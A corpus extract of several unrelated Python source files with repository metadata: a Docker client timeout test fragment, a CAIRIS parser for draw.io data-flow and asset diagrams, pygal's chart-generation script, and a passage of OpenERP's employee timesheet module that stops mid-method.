os.environ['DOCKER_CLIENT_TIMEOUT'] = timeout = "300"
client = docker_client.docker_client()
self.assertEqual(client.timeout, int(timeout))
| 28.217391 | 65 | 0.721109 |
56193647aa18ab4d433ae74c653e44d937a49017 | 12,203 | py | Python | cairis/mio/DiagramsNetContentHandler.py | anonymous-author21/cairis | feccb3ecc94ec864dbc87393e21de22bea704e19 | [
"Apache-2.0"
] | 62 | 2019-08-23T02:42:29.000Z | 2022-03-29T10:52:19.000Z | cairis/mio/DiagramsNetContentHandler.py | anonymous-author21/cairis | feccb3ecc94ec864dbc87393e21de22bea704e19 | [
"Apache-2.0"
] | 223 | 2019-07-29T09:49:54.000Z | 2022-03-29T09:48:21.000Z | cairis/mio/DiagramsNetContentHandler.py | anonymous-author21/cairis | feccb3ecc94ec864dbc87393e21de22bea704e19 | [
"Apache-2.0"
] | 32 | 2019-10-14T12:27:42.000Z | 2022-03-19T08:08:23.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from xml.sax.handler import ContentHandler,EntityResolver
from cairis.core.Borg import Borg
from xml.sax.saxutils import unescape
from cairis.core.ARM import ARMException
import re
__author__ = 'Shamal Faily'
def sanitise(str):
return re.sub(r'\<[^>]*\>','',str)
def attrsToDict(str):
g = {}
for val in list(map(lambda x: x.split('='),str.rstrip(';').split(';'))): g[val[0]] = val[1]
return g
class DiagramsNetContentHandler(ContentHandler,EntityResolver):
def __init__(self,modelType):
self.theModelType = modelType
self.theObjects = {}
self.theAssociations = []
self.theUpdatedAssociations = []
self.theTrustBoundaries = {}
self.theUpdatedTrustBoundaries = {}
self.theFlows = {}
self.theUpdatedFlows = []
self.resetObjectAttributes()
self.resetTrustBoundaryAttributes()
self.inFlow = 0
def resolveEntity(self,publicId,systemId):
return systemId
def resetObjectAttributes(self):
self.theObjectId = 0
self.inObject = 0
def resetTrustBoundaryAttributes(self):
self.theObjectId = 0
self.inTrustBoundary = 0
def objects(self): return list(self.theObjects.values())
def flows(self): return self.theUpdatedFlows
def trustBoundaries(self): return list(self.theUpdatedTrustBoundaries.values())
def associations(self): return self.theUpdatedAssociations
def startElement(self,name,attrs):
if (name == 'object'):
self.theObjectId = attrs['id']
if self.theModelType == 'dataflow':
if 'type' not in attrs:
if 'assets' not in attrs and self.theObjectId != '0':
self.theFlows[self.theObjectId] = {'assets' : ['Unknown information']}
elif 'assets' in attrs and self.theObjectId != '0':
self.theFlows[self.theObjectId] = {'name' : 'Undefined flow', 'assets' : list(map(lambda v: v.strip(), attrs['assets'].split(','))) }
self.inFlow = 1
else:
objtType = attrs['type'].lower().strip()
if objtType in ['trust_boundary','trust boundary','trustboundary']:
if 'name' not in attrs:
raise ARMException('Trust boundary defined without a name')
self.theTrustBoundaries[self.theObjectId] = {'name' : sanitise(attrs['name'])}
self.inTrustBoundary = 1
else:
if 'label' not in attrs:
raise ARMException('DFD object defined without a name')
objtName = sanitise(attrs['label'])
if objtType not in ['process','entity','datastore']:
raise ARMException(objtType + ' is not a valid type for DFD object ' + objtName)
self.theObjects[self.theObjectId] = {'name' : objtName, 'type' : objtType}
self.inObject = 1
elif self.theModelType == 'asset':
if 'label' not in attrs:
raise ARMException('Object ' + self.theObjectId + " has no label.")
assetName = attrs['label'].strip()
assetType = 'information'
if 'type' in attrs:
assetType = attrs['type'].lower().strip()
if (assetType not in ['hardware','information','people','software','systems']):
raise ARMException(attrs['type'] + " is an invalid type for asset " + assetName + ". Valid types are Hardware, Information, People, Software, and Systems.")
assetSC = 'TBD'
if 'short_code' in attrs:
assetSC = attrs['short_code']
assetDesc = 'To be defined'
if 'description' in attrs:
assetDesc = attrs['description']
assetSig = 'To be defined'
if 'significance' in attrs:
assetSig = attrs['significance']
secProperties = [0,0,0,0,0,0,0,0]
propRationale = ['None','None','None','None','None','None','None','None']
secAttrs = ['confidentiality','integrity','availability','accountability','anonymity','pseudonymity','unlinkability','unobservability']
valueLookup = {'none' : 0, 'low' : 1, 'medium' : 2, 'high' : 3}
for idx,secAttr in enumerate(secAttrs):
saKey = ''
if secAttr in attrs:
saKey = secAttr
elif secAttr not in attrs and secAttr.capitalize() in attrs:
saKey = secAttr.capitalize()
if saKey != '':
secProp = attrs[saKey].lower().strip()
if secProp not in valueLookup:
raise ARMException(secProp + ' is an invalid ' + secAttr + ' value for asset ' + assetName)
else:
propValue = valueLookup[secProp]
secProperties[idx] = propValue
prKey = secAttr + '_rationale'
if prKey in attrs:
propRationale[idx] = attrs[prKey]
else:
if propValue == 0:
propRationale[idx] = 'None'
else:
propRationale[idx] = 'To be defined'
else:
secProperties[idx] = 0
propRationale[idx] = 'None'
if (secProperties == [0,0,0,0,0,0,0,0]):
secAttrs = [0,0,1,0,0,0,0,0]
propRationale = []
for secProp in secProperties:
if (secProp == 0):
propRationale.append('None')
else:
propRationale.append('To be defined')
self.theObjects[self.theObjectId] = {'name' : assetName, 'short_code' : assetSC, 'type' : assetType.capitalize(), 'description' : assetDesc, 'significance' : assetSig, 'properties' : secProperties, 'rationale' : propRationale}
elif (name == 'mxCell' and self.theModelType == 'dataflow' and self.inFlow):
objectId = self.theObjectId
if('source' in attrs and 'target' in attrs and self.inFlow):
if objectId in self.theFlows:
self.theFlows[objectId]['from_name'] = attrs['source']
self.theFlows[objectId]['from_type'] = ''
self.theFlows[objectId]['to_name'] = attrs['target']
self.theFlows[objectId]['to_type'] = ''
elif('parent' in attrs and objectId in self.theFlows and attrs['parent'] != '0'):
self.theFlows[objectId]['name'] = attrs['value']
self.inFlow = 0
elif (name == 'mxCell' and self.theModelType == 'asset' and 'source' in attrs and 'target' in attrs):
if ('style' not in attrs):
raise ARMException('Missing style attribute in mxCell id ' + attrs['id'])
d = attrsToDict(attrs['style'])
headNav = 0
tailNav = 0
headType = 'Association'
tailType = 'Association'
if (('startArrow' not in d) and ('endArrow' not in d) and ('edgeStyle' in d) and (d['edgeStyle'] == 'orthogonalEdgeStyle')):
tailNav = 1
else:
if (('startArrow' not in d) or (d['startArrow'] == 'None')):
headType = 'Association'
elif d['startArrow'] in ['classic','open','openThin']:
headType = 'Association'
headNav = 1
elif d['startArrow'] in ['diamond','diamondThin']:
headType = 'Aggregation'
if d['startFill'] == 1:
headType = 'Composition'
elif d['startArrow'] == 'block':
headType = 'Inheritance'
if (('endArrow' not in d) or (d['endArrow'] == 'None')):
tailType = 'Association'
elif d['endArrow'] in ['classic','open','openThin']:
tailType = 'Association'
tailNav = 1
elif d['endArrow'] in ['diamond','diamondThin']:
tailType = 'Aggregation'
if d['endFill'] == 1:
tailType = 'Composition'
elif d['endArrow'] == 'block':
tailType = 'Inheritance'
self.theAssociations.append({'head' : attrs['source'], 'tail' : attrs['target'], 'headType' : headType, 'headNav' : headNav, 'tailType' : tailType, 'tailNav' : tailNav})
elif (name == 'mxGeometry' and self.theModelType == 'dataflow'):
if (self.inObject):
self.theObjects[self.theObjectId]['minX'] = float(attrs['x'])
self.theObjects[self.theObjectId]['maxX'] = float(attrs['x']) + float(attrs['width'])
self.theObjects[self.theObjectId]['minY'] = float(attrs['y'])
self.theObjects[self.theObjectId]['maxY'] = float(attrs['y']) + float(attrs['height'])
elif (self.inTrustBoundary):
self.theTrustBoundaries[self.theObjectId]['minX'] = float(attrs['x'])
self.theTrustBoundaries[self.theObjectId]['maxX'] = float(attrs['x']) + float(attrs['width'])
self.theTrustBoundaries[self.theObjectId]['minY'] = float(attrs['y'])
self.theTrustBoundaries[self.theObjectId]['maxY'] = float(attrs['y']) + float(attrs['height'])
def endElement(self,name):
if (name == 'object'):
if (self.inObject):
self.resetObjectAttributes()
elif (self.inTrustBoundary):
self.resetTrustBoundaryAttributes()
elif (name == 'diagram'):
if (self.theModelType == 'dataflow'):
self.updateFlows()
self.updateTrustBoundaries()
elif (self.theModelType == 'asset'):
self.updateAssociations()
def updateFlows(self):
validFlowTypes = set([('entity','process'),('process','entity'),('datastore','process'),('process','datastore'),('process','process')])
for objtKey in self.theFlows:
f = self.theFlows[objtKey]
dfName = f['name']
fromName = self.theObjects[f['from_name']]['name']
fromType = self.theObjects[f['from_name']]['type']
toName = self.theObjects[f['to_name']]['name']
toType = self.theObjects[f['to_name']]['type']
if ((fromType,toType) not in validFlowTypes):
raise ARMException('Data flow ' + dfName + ' is invalid because ' + fromType + ' to ' + toType + ' flows are not permissible.')
else:
self.theUpdatedFlows.append({'name' : dfName, 'from_name' : fromName, 'from_type' : fromType, 'to_name' : toName, 'to_type' : toType, 'assets' : f['assets']})
def updateTrustBoundaries(self):
for tbKey in self.theTrustBoundaries:
tbMinX = self.theTrustBoundaries[tbKey]['minX']
tbMaxX = self.theTrustBoundaries[tbKey]['maxX']
tbMinY = self.theTrustBoundaries[tbKey]['minY']
tbMaxY = self.theTrustBoundaries[tbKey]['maxY']
tbName = self.theTrustBoundaries[tbKey]['name']
for objtKey in self.theObjects:
objtName = self.theObjects[objtKey]['name']
minX = self.theObjects[objtKey]['minX']
maxX = self.theObjects[objtKey]['maxX']
minY = self.theObjects[objtKey]['minY']
maxY = self.theObjects[objtKey]['maxY']
if (tbMinX <= minX and tbMaxX >= maxX and tbMinY <= minY and tbMaxY >= maxY):
if (tbKey not in self.theUpdatedTrustBoundaries):
self.theUpdatedTrustBoundaries[tbKey] = {'name' : tbName, 'components' : []}
compType = self.theObjects[objtKey]['type']
if (compType == 'entity'):
raise ARMException("Cannot add entity " + objtName + " to trust boundary " + tbName + ". Entities are invalid trust boundary components.")
else:
self.theUpdatedTrustBoundaries[tbKey]['components'].append({'name' : objtName, 'type' : compType})
def updateAssociations(self):
for assoc in self.theAssociations:
self.theUpdatedAssociations.append({'head' : self.theObjects[assoc['head']]['name'], 'headType' : assoc['headType'], 'headNav' : assoc['headNav'], 'tail' : self.theObjects[assoc['tail']]['name'], 'tailType' : assoc['tailType'], 'tailNav' : assoc['tailNav']})
| 45.87594 | 264 | 0.616897 |
4289684cab73c355b80e91cd9e90905976279bc7 | 2,380 | py | Python | venv/Scripts/pygal_gen.py | xiaoshir/EnergyStorageTechnologies | 0298073d7bbd267919c6f08af4f24ca85168d629 | [
"BSD-3-Clause"
] | null | null | null | venv/Scripts/pygal_gen.py | xiaoshir/EnergyStorageTechnologies | 0298073d7bbd267919c6f08af4f24ca85168d629 | [
"BSD-3-Clause"
] | null | null | null | venv/Scripts/pygal_gen.py | xiaoshir/EnergyStorageTechnologies | 0298073d7bbd267919c6f08af4f24ca85168d629 | [
"BSD-3-Clause"
] | null | null | null | #!C:\Users\Adrian Grylka\PycharmProjects\untitled\venv\Scripts\python.exe
# -*- coding: utf-8 -*-
# This file is part of pygal
#
# A python svg graph plotting library
# Copyright © 2012-2016 Kozea
#
# This library is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with pygal. If not, see <http://www.gnu.org/licenses/>.
import argparse
import pygal
parser = argparse.ArgumentParser(
description='Generate pygal chart in command line',
prog='pygal_gen')
parser.add_argument('-t', '--type', dest='type', default='Line',
choices=map(lambda x: x.__name__, pygal.CHARTS),
help='Kind of chart to generate')
parser.add_argument('-o', '--output', dest='filename', default='pygal_out.svg',
help='Filename to write the svg to')
parser.add_argument('-s', '--serie', dest='series', nargs='+', action='append',
help='Add a serie in the form (title val1 val2...)')
parser.add_argument('--version', action='version',
version='pygal %s' % pygal.__version__)
for key in pygal.config.CONFIG_ITEMS:
opt_name = key.name
val = key.value
opts = {}
if key.type == list:
opts['type'] = key.subtype
opts['nargs'] = '+'
else:
opts['type'] = key.type
if opts['type'] == bool:
del opts['type']
opts['action'] = 'store_true' if not val else 'store_false'
if val:
opt_name = 'no-' + opt_name
if key.name == 'interpolate':
opts['choices'] = list(pygal.interpolate.INTERPOLATIONS.keys())
parser.add_argument(
'--%s' % opt_name, dest=key.name, default=val, **opts)
config = parser.parse_args()
chart = getattr(pygal, config.type)(**vars(config))
for serie in config.series:
chart.add(serie[0], map(float, serie[1:]))
chart.render_to_file(config.filename)
| 34.492754 | 79 | 0.657143 |
1d7e701ed14ec50ad6315a2af496f591f0a1d096 | 31,815 | py | Python | openerp/addons/hr_timesheet_sheet/hr_timesheet_sheet.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 3 | 2016-01-29T14:39:49.000Z | 2018-12-29T22:42:00.000Z | openerp/addons/hr_timesheet_sheet/hr_timesheet_sheet.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 2 | 2016-03-23T14:29:41.000Z | 2017-02-20T17:11:30.000Z | openerp/addons/hr_timesheet_sheet/hr_timesheet_sheet.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from dateutil.relativedelta import relativedelta
from pytz import timezone
import pytz
from openerp.osv import fields, osv
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT
from openerp.tools.translate import _
from openerp import netsvc
class hr_timesheet_sheet(osv.osv):
_name = "hr_timesheet_sheet.sheet"
_inherit = "mail.thread"
_table = 'hr_timesheet_sheet_sheet'
_order = "id desc"
_description="Timesheet"
def _total(self, cr, uid, ids, name, args, context=None):
""" Compute the attendances, analytic lines timesheets and differences between them
for all the days of a timesheet and the current day
"""
res = {}
for sheet in self.browse(cr, uid, ids, context=context or {}):
res.setdefault(sheet.id, {
'total_attendance': 0.0,
'total_timesheet': 0.0,
'total_difference': 0.0,
})
for period in sheet.period_ids:
res[sheet.id]['total_attendance'] += period.total_attendance
res[sheet.id]['total_timesheet'] += period.total_timesheet
res[sheet.id]['total_difference'] += period.total_attendance - period.total_timesheet
return res
def check_employee_attendance_state(self, cr, uid, sheet_id, context=None):
ids_signin = self.pool.get('hr.attendance').search(cr,uid,[('sheet_id', '=', sheet_id),('action','=','sign_in')])
ids_signout = self.pool.get('hr.attendance').search(cr,uid,[('sheet_id', '=', sheet_id),('action','=','sign_out')])
if len(ids_signin) != len(ids_signout):
raise osv.except_osv(('Warning!'),_('The timesheet cannot be validated as it does not contain an equal number of sign ins and sign outs.'))
return True
def copy(self, cr, uid, ids, *args, **argv):
raise osv.except_osv(_('Error!'), _('You cannot duplicate a timesheet.'))
def create(self, cr, uid, vals, context=None):
if 'employee_id' in vals:
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).user_id:
raise osv.except_osv(_('Error!'), _('In order to create a timesheet for this employee, you must assign it to a user.'))
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).product_id:
raise osv.except_osv(_('Error!'), _('In order to create a timesheet for this employee, you must link the employee to a product, like \'Consultant\'.'))
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).journal_id:
raise osv.except_osv(_('Configuration Error!'), _('In order to create a timesheet for this employee, you must assign an analytic journal to the employee, like \'Timesheet Journal\'.'))
if vals.get('attendances_ids'):
# If attendances, we sort them by date asc before writing them, to satisfy the alternance constraint
vals['attendances_ids'] = self.sort_attendances(cr, uid, vals['attendances_ids'], context=context)
return super(hr_timesheet_sheet, self).create(cr, uid, vals, context=context)
def write(self, cr, uid, ids, vals, context=None):
if 'employee_id' in vals:
new_user_id = self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).user_id.id or False
if not new_user_id:
raise osv.except_osv(_('Error!'), _('In order to create a timesheet for this employee, you must assign it to a user.'))
if not self._sheet_date(cr, uid, ids, forced_user_id=new_user_id, context=context):
raise osv.except_osv(_('Error!'), _('You cannot have 2 timesheets that overlap!\nYou should use the menu \'My Timesheet\' to avoid this problem.'))
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).product_id:
raise osv.except_osv(_('Error!'), _('In order to create a timesheet for this employee, you must link the employee to a product.'))
if not self.pool.get('hr.employee').browse(cr, uid, vals['employee_id'], context=context).journal_id:
raise osv.except_osv(_('Configuration Error!'), _('In order to create a timesheet for this employee, you must assign an analytic journal to the employee, like \'Timesheet Journal\'.'))
if vals.get('attendances_ids'):
# If attendances, we sort them by date asc before writing them, to satisfy the alternance constraint
# In addition to the date order, deleting attendances are done before inserting attendances
vals['attendances_ids'] = self.sort_attendances(cr, uid, vals['attendances_ids'], context=context)
res = super(hr_timesheet_sheet, self).write(cr, uid, ids, vals, context=context)
if vals.get('attendances_ids'):
for timesheet in self.browse(cr, uid, ids):
if not self.pool['hr.attendance']._altern_si_so(cr, uid, [att.id for att in timesheet.attendances_ids]):
raise osv.except_osv(_('Warning !'), _('Error ! Sign in (resp. Sign out) must follow Sign out (resp. Sign in)'))
return res
def sort_attendances(self, cr, uid, attendance_tuples, context=None):
date_attendances = []
for att_tuple in attendance_tuples:
if att_tuple[0] in [0,1,4]:
if att_tuple[0] in [0,1]:
name = att_tuple[2]['name']
else:
name = self.pool['hr.attendance'].browse(cr, uid, att_tuple[1]).name
date_attendances.append((1, name, att_tuple))
elif att_tuple[0] in [2,3]:
date_attendances.append((0, self.pool['hr.attendance'].browse(cr, uid, att_tuple[1]).name, att_tuple))
else:
date_attendances.append((0, False, att_tuple))
date_attendances.sort()
return [att[2] for att in date_attendances]
def button_confirm(self, cr, uid, ids, context=None):
for sheet in self.browse(cr, uid, ids, context=context):
if sheet.employee_id and sheet.employee_id.parent_id and sheet.employee_id.parent_id.user_id:
self.message_subscribe_users(cr, uid, [sheet.id], user_ids=[sheet.employee_id.parent_id.user_id.id], context=context)
self.check_employee_attendance_state(cr, uid, sheet.id, context=context)
di = sheet.user_id.company_id.timesheet_max_difference
if (abs(sheet.total_difference) < di) or not di:
wf_service = netsvc.LocalService("workflow")
wf_service.trg_validate(uid, 'hr_timesheet_sheet.sheet', sheet.id, 'confirm', cr)
else:
raise osv.except_osv(_('Warning!'), _('Please verify that the total difference of the sheet is lower than %.2f.') %(di,))
return True
def attendance_action_change(self, cr, uid, ids, context=None):
hr_employee = self.pool.get('hr.employee')
employee_ids = []
for sheet in self.browse(cr, uid, ids, context=context):
if sheet.employee_id.id not in employee_ids: employee_ids.append(sheet.employee_id.id)
return hr_employee.attendance_action_change(cr, uid, employee_ids, context=context)
_columns = {
'name': fields.char('Note', size=64, select=1,
states={'confirm':[('readonly', True)], 'done':[('readonly', True)]}),
'employee_id': fields.many2one('hr.employee', 'Employee', required=True),
'user_id': fields.related('employee_id', 'user_id', type="many2one", relation="res.users", store=True, string="User", required=False, readonly=True),#fields.many2one('res.users', 'User', required=True, select=1, states={'confirm':[('readonly', True)], 'done':[('readonly', True)]}),
'date_from': fields.date('Date from', required=True, select=1, readonly=True, states={'new':[('readonly', False)]}),
'date_to': fields.date('Date to', required=True, select=1, readonly=True, states={'new':[('readonly', False)]}),
'timesheet_ids' : fields.one2many('hr.analytic.timesheet', 'sheet_id',
'Timesheet lines',
readonly=True, states={
'draft': [('readonly', False)],
'new': [('readonly', False)]}
),
'attendances_ids' : fields.one2many('hr.attendance', 'sheet_id', 'Attendances'),
'state' : fields.selection([
('new', 'New'),
('draft','Open'),
('confirm','Waiting Approval'),
('done','Approved')], 'Status', select=True, required=True, readonly=True,
help=' * The \'Draft\' status is used when a user is encoding a new and unconfirmed timesheet. \
\n* The \'Confirmed\' status is used for to confirm the timesheet by user. \
\n* The \'Done\' status is used when users timesheet is accepted by his/her senior.'),
'state_attendance' : fields.related('employee_id', 'state', type='selection', selection=[('absent', 'Absent'), ('present', 'Present')], string='Current Status', readonly=True),
'total_attendance': fields.function(_total, method=True, string='Total Attendance', multi="_total"),
'total_timesheet': fields.function(_total, method=True, string='Total Timesheet', multi="_total"),
'total_difference': fields.function(_total, method=True, string='Difference', multi="_total"),
'period_ids': fields.one2many('hr_timesheet_sheet.sheet.day', 'sheet_id', 'Period', readonly=True),
'account_ids': fields.one2many('hr_timesheet_sheet.sheet.account', 'sheet_id', 'Analytic accounts', readonly=True),
'company_id': fields.many2one('res.company', 'Company'),
'department_id':fields.many2one('hr.department','Department'),
}
def _default_date_from(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
r = user.company_id and user.company_id.timesheet_range or 'month'
if r=='month':
return time.strftime('%Y-%m-01')
elif r=='week':
return (datetime.today() + relativedelta(weekday=0, days=-6)).strftime('%Y-%m-%d')
elif r=='year':
return time.strftime('%Y-01-01')
return time.strftime('%Y-%m-%d')
def _default_date_to(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
r = user.company_id and user.company_id.timesheet_range or 'month'
if r=='month':
return (datetime.today() + relativedelta(months=+1,day=1,days=-1)).strftime('%Y-%m-%d')
elif r=='week':
return (datetime.today() + relativedelta(weekday=6)).strftime('%Y-%m-%d')
elif r=='year':
return time.strftime('%Y-12-31')
return time.strftime('%Y-%m-%d')
def _default_employee(self, cr, uid, context=None):
emp_ids = self.pool.get('hr.employee').search(cr, uid, [('user_id','=',uid)], context=context)
return emp_ids and emp_ids[0] or False
_defaults = {
'date_from' : _default_date_from,
'date_to' : _default_date_to,
'state': 'new',
'employee_id': _default_employee,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'hr_timesheet_sheet.sheet', context=c)
}
def _sheet_date(self, cr, uid, ids, forced_user_id=False, context=None):
for sheet in self.browse(cr, uid, ids, context=context):
new_user_id = forced_user_id or sheet.user_id and sheet.user_id.id
if new_user_id:
cr.execute('SELECT id \
FROM hr_timesheet_sheet_sheet \
WHERE (date_from <= %s and %s <= date_to) \
AND user_id=%s \
AND id <> %s',(sheet.date_to, sheet.date_from, new_user_id, sheet.id))
if cr.fetchall():
return False
return True
_constraints = [
(_sheet_date, 'You cannot have 2 timesheets that overlap!\nPlease use the menu \'My Current Timesheet\' to avoid this problem.', ['date_from','date_to']),
]
def action_set_to_draft(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'state': 'draft'})
wf_service = netsvc.LocalService('workflow')
for id in ids:
wf_service.trg_create(uid, self._name, id, cr)
return True
def name_get(self, cr, uid, ids, context=None):
if not ids:
return []
if isinstance(ids, (long, int)):
ids = [ids]
return [(r['id'], _('Week ')+datetime.strptime(r['date_from'], '%Y-%m-%d').strftime('%U')) \
for r in self.read(cr, uid, ids, ['date_from'],
context=context, load='_classic_write')]
def unlink(self, cr, uid, ids, context=None):
sheets = self.read(cr, uid, ids, ['state','total_attendance'], context=context)
for sheet in sheets:
if sheet['state'] in ('confirm', 'done'):
raise osv.except_osv(_('Invalid Action!'), _('You cannot delete a timesheet which is already confirmed.'))
elif sheet['total_attendance'] <> 0.00:
raise osv.except_osv(_('Invalid Action!'), _('You cannot delete a timesheet which have attendance entries.'))
return super(hr_timesheet_sheet, self).unlink(cr, uid, ids, context=context)
def onchange_employee_id(self, cr, uid, ids, employee_id, context=None):
department_id = False
user_id = False
if employee_id:
empl_id = self.pool.get('hr.employee').browse(cr, uid, employee_id, context=context)
department_id = empl_id.department_id.id
user_id = empl_id.user_id.id
return {'value': {'department_id': department_id, 'user_id': user_id,}}
# ------------------------------------------------
# OpenChatter methods and notifications
# ------------------------------------------------
def _needaction_domain_get(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
empids = emp_obj.search(cr, uid, [('parent_id.user_id', '=', uid)], context=context)
if not empids:
return False
dom = ['&', ('state', '=', 'confirm'), ('employee_id', 'in', empids)]
return dom
class account_analytic_line(osv.osv):
_inherit = "account.analytic.line"
def _get_default_date(self, cr, uid, context=None):
if context is None:
context = {}
#get the default date (should be: today)
res = super(account_analytic_line, self)._get_default_date(cr, uid, context=context)
#if we got the dates from and to from the timesheet and if the default date is in between, we use the default
#but if the default isn't included in those dates, we use the date start of the timesheet as default
if context.get('timesheet_date_from') and context.get('timesheet_date_to'):
if context['timesheet_date_from'] <= res <= context['timesheet_date_to']:
return res
return context.get('timesheet_date_from')
#if we don't get the dates from the timesheet, we return the default value from super()
return res
class hr_timesheet_line(osv.osv):
_inherit = "hr.analytic.timesheet"
def _sheet(self, cursor, user, ids, name, args, context=None):
sheet_obj = self.pool.get('hr_timesheet_sheet.sheet')
res = {}.fromkeys(ids, False)
for ts_line in self.browse(cursor, user, ids, context=context):
sheet_ids = sheet_obj.search(cursor, user,
[('date_to', '>=', ts_line.date), ('date_from', '<=', ts_line.date),
('employee_id.user_id', '=', ts_line.user_id.id)],
context=context)
if sheet_ids:
# [0] because only one sheet possible for an employee between 2 dates
res[ts_line.id] = sheet_obj.name_get(cursor, user, sheet_ids, context=context)[0]
return res
def _get_hr_timesheet_sheet(self, cr, uid, ids, context=None):
ts_line_ids = []
for ts in self.browse(cr, uid, ids, context=context):
cr.execute("""
SELECT l.id
FROM hr_analytic_timesheet l
INNER JOIN account_analytic_line al
ON (l.line_id = al.id)
WHERE %(date_to)s >= al.date
AND %(date_from)s <= al.date
AND %(user_id)s = al.user_id
GROUP BY l.id""", {'date_from': ts.date_from,
'date_to': ts.date_to,
'user_id': ts.employee_id.user_id.id,})
ts_line_ids.extend([row[0] for row in cr.fetchall()])
return ts_line_ids
def _get_account_analytic_line(self, cr, uid, ids, context=None):
ts_line_ids = self.pool.get('hr.analytic.timesheet').search(cr, uid, [('line_id', 'in', ids)])
return ts_line_ids
_columns = {
'sheet_id': fields.function(_sheet, string='Sheet', select="1",
type='many2one', relation='hr_timesheet_sheet.sheet', ondelete="cascade",
store={
'hr_timesheet_sheet.sheet': (_get_hr_timesheet_sheet, ['employee_id', 'date_from', 'date_to'], 10),
'account.analytic.line': (_get_account_analytic_line, ['user_id', 'date'], 10),
'hr.analytic.timesheet': (lambda self,cr,uid,ids,context=None: ids, None, 10),
},
),
}
def _check_sheet_state(self, cr, uid, ids, context=None):
if context is None:
context = {}
for timesheet_line in self.browse(cr, uid, ids, context=context):
if timesheet_line.sheet_id and timesheet_line.sheet_id.state not in ('draft', 'new'):
return False
return True
_constraints = [
(_check_sheet_state, 'You cannot modify an entry in a Confirmed/Done timesheet !', ['state']),
]
def unlink(self, cr, uid, ids, *args, **kwargs):
if isinstance(ids, (int, long)):
ids = [ids]
self._check(cr, uid, ids)
return super(hr_timesheet_line,self).unlink(cr, uid, ids,*args, **kwargs)
def _check(self, cr, uid, ids):
for att in self.browse(cr, uid, ids):
if att.sheet_id and att.sheet_id.state not in ('draft', 'new'):
raise osv.except_osv(_('Error!'), _('You cannot modify an entry in a confirmed timesheet.'))
return True
def multi_on_change_account_id(self, cr, uid, ids, account_ids, context=None):
return dict([(el, self.on_change_account_id(cr, uid, ids, el, context.get('user_id', uid))) for el in account_ids])
hr_timesheet_line()
class hr_attendance(osv.osv):
_inherit = "hr.attendance"
def _get_default_date(self, cr, uid, context=None):
if context is None:
context = {}
if 'name' in context:
return context['name'] + time.strftime(' %H:%M:%S')
return time.strftime('%Y-%m-%d %H:%M:%S')
def _get_hr_timesheet_sheet(self, cr, uid, ids, context=None):
attendance_ids = []
for ts in self.browse(cr, uid, ids, context=context):
cr.execute("""
SELECT a.id
FROM hr_attendance a
INNER JOIN hr_employee e
INNER JOIN resource_resource r
ON (e.resource_id = r.id)
ON (a.employee_id = e.id)
WHERE %(date_to)s >= date_trunc('day', a.name)
AND %(date_from)s <= a.name
AND %(user_id)s = r.user_id
GROUP BY a.id""", {'date_from': ts.date_from,
'date_to': ts.date_to,
'user_id': ts.employee_id.user_id.id,})
attendance_ids.extend([row[0] for row in cr.fetchall()])
return attendance_ids
def _get_attendance_employee_tz(self, cr, uid, employee_id, date, context=None):
""" Simulate timesheet in employee timezone
Return the attendance date in string format in the employee
tz converted from utc timezone as we consider date of employee
timesheet is in employee timezone
"""
employee_obj = self.pool['hr.employee']
tz = False
if employee_id:
employee = employee_obj.browse(cr, uid, employee_id, context=context)
tz = employee.user_id.partner_id.tz
if not date:
date = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
att_tz = timezone(tz or 'utc')
attendance_dt = datetime.strptime(date, DEFAULT_SERVER_DATETIME_FORMAT)
att_tz_dt = pytz.utc.localize(attendance_dt)
att_tz_dt = att_tz_dt.astimezone(att_tz)
# We take only the date omiting the hours as we compare with timesheet
# date_from which is a date format thus using hours would lead to
# be out of scope of timesheet
att_tz_date_str = datetime.strftime(att_tz_dt, DEFAULT_SERVER_DATE_FORMAT)
return att_tz_date_str
def _get_current_sheet(self, cr, uid, employee_id, date=False, context=None):
